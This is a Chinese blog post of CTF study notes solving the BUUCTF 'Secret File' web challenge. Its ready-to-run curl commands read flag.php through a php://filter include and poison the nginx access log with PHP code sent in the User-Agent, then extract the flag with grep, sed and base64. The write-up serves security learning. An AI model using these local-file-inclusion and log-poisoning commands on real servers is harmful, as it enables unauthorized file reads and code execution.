CTF学习记录(6.2)

已于 2023-06-04 08:58:24 修改
阅读量91 收藏
点赞数
文章标签: 学习
于 2023-06-03 20:49:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73710531/article/details/131011407
版权

绕过preg-match对flag过滤可以用\绕过,flag等同于f\l\a\gpreg绕过

BUUCTF-[极客大挑战 2019]Secret File1--好像可以用中国蚂剑--之后再搞

第一种:伪协议,一键获得

curl "http://fe888d52-46a9-4eb7-81e1-2ea5496cc3ac.node4.buuoj.cn:81/secr3t.php" --get --data "file=php://filter/read=convert.base64-encode/resource=flag.php"

第二种日志上传漏洞   日志上传漏洞的本质,好像是一句话木马。首先确认是什么服务器,可以输入1.php

然后

apache一般是/var/log/apache/access.log。:

nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

 这些目录里面记录了我们访问过的日志(哪怕是错误访问)那么,我们就想要执行这些文件

当访问一个不存在的资源时,Apache日志同样会记录 例如访问http://127.0.0.1/<?php phpinfo();?>。Apache会记录请求“<?php phpinfo();?>”,并写到access.log文件中,这时候去包含access.log就可以利用包含漏洞

但并不能直接利用,原因是直接访问URL后,一句话木马在日志文件中被编码了 需要通过burpsuite拦截直接访问http://127.0.0.1/<?php phpinfo();?> 

先访问一次/var/log/nginx/access.log,确认能不能有日志上传漏洞,发现页面有显示,接下来就要在日志中输入错误

 然后再post

 

 最后在源代码找到flag-qwq

curl一键获得 get上传

curl "http://fe888d52-46a9-4eb7-81e1-2ea5496cc3ac.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log" --user-agent "<?php echo file_get_contents('flag.php')?>"
curl "http://cb91b2a3-ac7c-4ed3-8a34-0e779ce95ea1.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log" --user-agent "<?php echo file_get_contents('flag.php')?>" -s -o output.txt && findstr /R "flag{.*}" output.txt

改良版本

linux版本

curl 'http://4be38139-6ca1-4224-beb5-5266884e017e.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log' --user-agent "<?php echo file_get_contents('flag.php')?>" -s | grep '$flag' | uniq | sed 's/.*\(flag{.*}\).*/\1/'
curl 'http://4be38139-6ca1-4224-beb5-5266884e017e.node4.buuoj.cn:81/secr3t.php' --get --data 'file=php://filter/read=convert.base64-encode/resource=flag.php' -s | grep '</html>' | sed -n "s/.*>\([A-Za-z0-9+/]\+=\).*/\1/p" | base64 -d | grep flag | sed -n 's/.*\(flag{.*}\).*/\1/p'

想跑步的小弱鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTF-web学习大纲
01-30
CTF-web学习大纲
我当年自学黑客(网络安全)的一些心得!(内附学习笔记)
2401_84264727的博客
04-29 208
(这里额外提一句,学习编程虽然不能带你入门,但是却能决定你能在网络安全这条路上到底能走多远,所以推荐大家自学一些基础编程的知识)
2024年网安最新我当年自学黑客(网络安全)的一些心得!(内附学习笔记)
2401_84302816的博客
05-01 863
至于编程语言,首推Python,因为其良好的拓展支持性。当然现在市面上很多网站都是PHP的开发的,所以选择PHP也是可以的。其他语言还包括C++、Java…很多朋友会问是不是要学习所有的语言呢?答案是否定的!引用我上面的一句话:学习编程只是工具不是目的,我们的目标不是成为程序员(这里额外提一句,学习编程虽然不能带你入门,但是却能决定你能在网络安全这条路上到底能走多远,所以推荐大家自学一些基础编程的知识)
适合自学的网络安全基础技能“蓝宝书”:《CTF那些事儿》_高中生ctf入门书
weixin_42340783的博客
04-28 1615
本书由顶级CTF战队Lancet的指导教师李舟军教授和核心团队成员历时4年打磨而成,创新性地提出了新的CTF知识学习框架,体现了李舟军教授多年的教学精髓和带队经验。书中涵盖PWN、逆向、Web等常见题目,并系统性总结了CTF比赛中工控安全的考察方式。不仅讲授基础知识和操作技能,还探讨CTF赛题的本质,着重阐述了面对不同类型题目时的分析思路和方法。同时,书中针对CTF比赛学习的编排方式,符合我国主流的计算机学科知识体系结构,李舟军教授结合学生的实战经验,为网络安全空间爱好者提供了一本教科书式的实践指导手册。
2024年网络安全最新我当年自学黑客(网络安全)的一些心得!(内附学习笔记)(1)
2401_84301315的博客
05-03 1078
Python编程学习学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。
CTF实战:从入门到提升
chen520的博客
06-25 6620
本书采用理论与案例相结合的形式,全面讲解传统网络安全竞赛CTF解题赛中五大类重点知识和技能。全书共17章,其中第1~3章为第1篇Web安全,从原理层面讲解了最常见的PHP相关安全问题,以及文件上传漏洞、文件包含漏洞、命令执行漏洞、SQL注入漏洞、SSRF漏洞等常见Web漏洞的原理与利用;第4~6章为第2篇Crypto密码,主要介绍了密码学基础、常见编码、古典密码学和现代密码学等相关内容;第7~10章为第3篇MISC安全,主要介绍了隐写术、压缩包分析、流量分析和取证分析等相关内容;
计算机网络 学习笔记
weixin_44194628的博客
04-19 1341
路由器: 隔绝广播域 集线器: 在物理层,既在广播域,又在冲突域 交换机: 在数据链路层,在一个广播域中,不在一个冲突域。1.机械特性:定义物理连接的特性,规定物理连接时所采用的规格、接口形状、引线数目、引脚数量和排列情况。 2.电气特性:规定传输二进制时,线路上信号的电压范围、抗阻匹配、传输速率和距离限制等。 3.功能特性:指明某条线上出现的某一电平表示何种意义,接口部件的信号线的用途。 4.规程特性(过程特性):定义各条物理线路的工作规程和时序关系。影响失真程度的因素: 1.码元传输速率 2.信号传输距
CTF攻防世界web初级区详解
qq_62540010的博客
12-05 4346
最近几天刚刚接触了ctf,去尝试了一下攻防世界web区的新手篇题目,以下解题过程记录一下自己的学习体会与心得,如果哪里有错可以在评论区告诉我,我及时改正。 1.view_source 1.1获取场景后: 1.2根据题目要求,我们需要查看网页源代码,打开方式一种是鼠标右键打开,一种是按F12键,题目规定无法右键,所以我们按F12打开,如图: 1.3第二种解法:在其他网页打开源代码后把地址换成该网页地址,即view-source:后加上该网页地址,如图: 至此拿到flag,第一题完成 2.robot
CTF/黑客之提问的智慧
半岛铁盒的博客
12-27 1546
转的一篇文章,原文https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way 正文 在黑客的世界裡,当你抛出一个技术问题时,最终是否能得到有用的回答,往往取决于你所提问和追问的方式。本指南将教你如何正确的提问以获得你满意的答案。 不只是黑客,现在开放原始码(Open Source)软体已经相当盛行,你常常也可以由其他有经验的使用者身上得到好答案,这是件好事;使用者比起黑客来,往往对那些新手常遇到的问题更宽容一些。然而,将有经验的使用者视为黑
学习笔记四:sql手工注入
mcc的博客
06-05 1182
sql-labs靶机通关 原文链接:http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/#less-29 1.Less-1 暴库 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; #检查是否存在漏洞 http://127.0.0.1/4/L...
网络安全与CTF在线学习资源
05-18
里面整理了各个综合学习平台的网址,和各个比较靠谱的博客网址等等,有安全学习的朋友可以下载看看!
ctf-工具包,包含ctf学习的几乎所有工具。
08-13
ctf-工具包,包含ctf学习的几乎所有工具。
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
车身域测试学习、CANoe工具实操学习、UDS诊断测试、功能安全测试、DTC故障注入测试、DBC数据库、CDD数据库、CAN一致性测试
车载测试
08-12 582
车身域测试学习、CANoe工具实操学习、UDS诊断测试、功能安全测试、DTC故障注入测试、DBC数据库、CDD数据库、CAN一致性测试
OrangePi AIpro学习5 —— 模型推理程序开发
HuanBianCheng27的博客
08-13 942
本章讲解Resnet50模型如何运行在昇腾芯片上,如何对图片进行推理
【IC设计】昇腾910架构学习
VICI的博客
08-10 281
昇腾910是华为的AI训练卡,基于7nm EUV工艺,其中有16个基于ARMv8定制的CPU,32个Ascend-Max AI加速器,使用4*6的无缓存NoC Mesh进行互联,使用HBM(High Bandwidth Memory)进行存储,提供128通道的视频译码器。本文内容是参考华为公开资料形成的个人观点,无侵权行为,内容仅供学习
8月13日学习笔记 LVS
最新发布
weixin_70751701的博客
08-13 801
目标地址散列调度算法先根据请求的目标IP地址,作为散列键 (Hash Key)从静态分配的散列表找出对应的服务器,若该服务器 是可用的且未超载,将请求发送到该服务器,否则返回空。1. 配置两个网卡和两个ip地址,正常来说应该配置两个不同的网段的 ip,一个对外的vip,一个对内的dip,现在主要使用nat的网络模 式,可以配置桥接模式对外,Nat对内,教师机不方便配置桥接模 式,所以都是配置的nat模式,但是一定要分清楚哪个ip是vip,哪个 ip是dip,在物理主机上都要能够ping通。
6.CTF 学习路线 6.1 初期 6.2 中期 6.3 后期
06-26
CTF(Capture The Flag)全称网络安全夺旗赛,是一种网络安全竞赛形式,参与者需要运用各种技能解决挑战,包括漏洞挖掘、密码学、取证分析等。学习 CTF 的路线可以分为三个阶段: 6.1 初期 - **入门基础**:首先,了解网络安全基础知识,如网络协议、操作系统原理、基本的漏洞类型(如缓冲区溢出、权限提升等)。熟悉基本的 Linux 命令行工具,如 `nc`、`grep`、`sed` 等,这些是基础操作。 - **编程语言**:掌握至少一种编程语言,如 Python 或 C/C++,用于编写自动化脚本或实现解密算法。 - **工具学习**:学习网络安全工具,如 Metasploit、Nmap、Wireshark 等,以及漏洞扫描和渗透测试框架。 - **基础知识挑战**:参加在线平台的入门级 CTF 比赛或练习题,了解比赛流程和基本策略。 6.2 中期 - **进阶技术**:深入学习特定领域的 CTF 技术,比如 Web 安全(SQL 注入、XSS、CSRF)、加密与密码学(AES、RSA、哈希函数)、二进制分析等。 - **渗透测试**:学习如何模拟攻击并防御,理解渗透测试框架 Kali Linux 的使用。 - **团队协作**:开始加入 CTF 团队,学习团队合作与信息共享,理解和使用工具进行团队配合。 - **参加比赛**:参加中等难度的 CTF 比赛,提升实战经验,并了解业界动态。 6.3 后期 - **研究与开发**:关注安全领域的新技术和漏洞,研究漏洞发掘和利用方法,参与漏洞报告和修复过程。 - **高级技术**:涉及高级安全领域,如供应链安全、零日攻击、云安全等,同时学习如何构建安全体系。 - **领导角色**:如果你有兴趣,可以向成为领队或教练发展,指导他人学习,或者创建自己的 CTF 题库。 - **持续学习**:网络安全是一个不断变化的领域,保持对新技术的关注和学习,如 AI 安全、物联网安全等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值